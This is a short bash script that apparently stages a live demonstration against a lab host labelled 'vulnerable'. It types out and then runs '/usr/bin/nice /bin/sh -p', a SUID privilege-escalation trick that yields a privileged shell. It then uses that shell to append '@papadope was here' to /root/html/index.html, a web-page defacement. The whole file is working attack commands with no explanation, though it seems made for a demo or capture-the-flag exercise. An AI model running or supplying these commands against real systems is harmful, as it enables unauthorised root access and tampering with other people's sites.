#!/bin/bash

echo -n "vulnerable:1> "
sleep 1
echo "/usr/bin/nice /bin/sh -p" | pv -qL 10 
/usr/bin/nice /bin/sh -p
echo -n "vulnerable:1> "
sleep 1
echo "sh -c 'echo \"@papadope was here\" >> /root/html/index.html'" | pv -qL 10 
sh -c 'echo "@papadope was here" >> /root/html/index.html'
exit
